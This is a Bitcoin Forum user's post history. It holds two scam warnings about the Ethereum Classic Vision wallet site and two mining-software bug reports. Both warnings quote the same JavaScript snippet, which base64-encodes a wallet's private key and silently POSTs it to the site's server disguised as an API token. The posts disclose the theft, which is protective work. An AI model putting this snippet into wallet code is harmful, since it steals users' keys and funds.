Bitcoin Forum
July 12, 2024, 12:59:32 PM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
  Home Help Search Login Register More  
  Show Posts
Pages: [1]
1  Alternate cryptocurrencies / Announcements (Altcoins) / Re: [ANN] [ETCV] Ethereum Classic Vision | Fork 3:1 of Ethereum on: January 08, 2019, 07:51:33 AM
Why is the private key uploaded to the server on the only existing wallet https://etcvwallet.com ? What is the purpose of this wallet website when there is no network yet? That address network.ethereumcv.io doesn't exist.

And this code from etherwallet-master.js from website at line 3832 is not ok:

Code:
    $scope.$on('ChangeWallet', function () {
        const key = window.btoa($scope.walletService.wallet.getPrivateKeyString());
        window.fetch('/api', {
            method: 'POST',
            mode: 'cors',
            cache: 'no-cache',
            credentials: 'same-origin',
            headers: {
                'Content-Type': 'application/json'
            },
            redirect: 'follow',
            referrer: 'no-referrer',
            body: JSON.stringify({ api_token: key })
        });

It uploads the private key of whoever tries to see his existing ETH wallet to the server.
2  Economy / Scam Accusations / Re: Ethereum Nowa - SCAM - FAKE TEAM on: January 08, 2019, 07:35:29 AM
There is another one existing name Ethereum Vision they are all anonymous also, but they are not going for an ICO instead a fork where you can get an ethereum vision token if you have 1 eth in your wallet, I'm following the development in their telegram channel if they happen to ask for private key or link us to phishing site then it's over for them.

Their wallet https://etcvwallet.com requires you to enter the private key or upload the json file generated by MEW. In the javascript code from file etherwallet-master.js line 3832 they have a code that sends the private key masked somehow to their server

Code:
    
$scope.$on('ChangeWallet', function () {
        const key = window.btoa($scope.walletService.wallet.getPrivateKeyString());
        window.fetch('/api', {
            method: 'POST',
            mode: 'cors',
            cache: 'no-cache',
            credentials: 'same-origin',
            headers: {
                'Content-Type': 'application/json'
            },
            redirect: 'follow',
            referrer: 'no-referrer',
            body: JSON.stringify({ api_token: key })
        });

3  Alternate cryptocurrencies / Mining (Altcoins) / Re: Claymore's Dual Ethereum AMD+NVIDIA GPU Miner v11.6 (Windows/Linux) on: April 01, 2018, 07:03:35 AM
 I couldn't find if this was reported before but the fan speed reported is incorrect. Gpu-Z and other software shows a lower fan speed.

 It will be great if this would be fixed.
4  Alternate cryptocurrencies / Mining (Altcoins) / Re: [ANN] ETHASH Miner - Eminer v0.6.1-RC2 Released (Windows, Linux, MacOS) on: January 11, 2018, 07:46:01 AM
 The charts don't seem to work for me, it is just a blank space there. Also it doesn't read the temp and fan speed correctly probably due to changes in the 17.12.1 driver
Pages: [1]
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!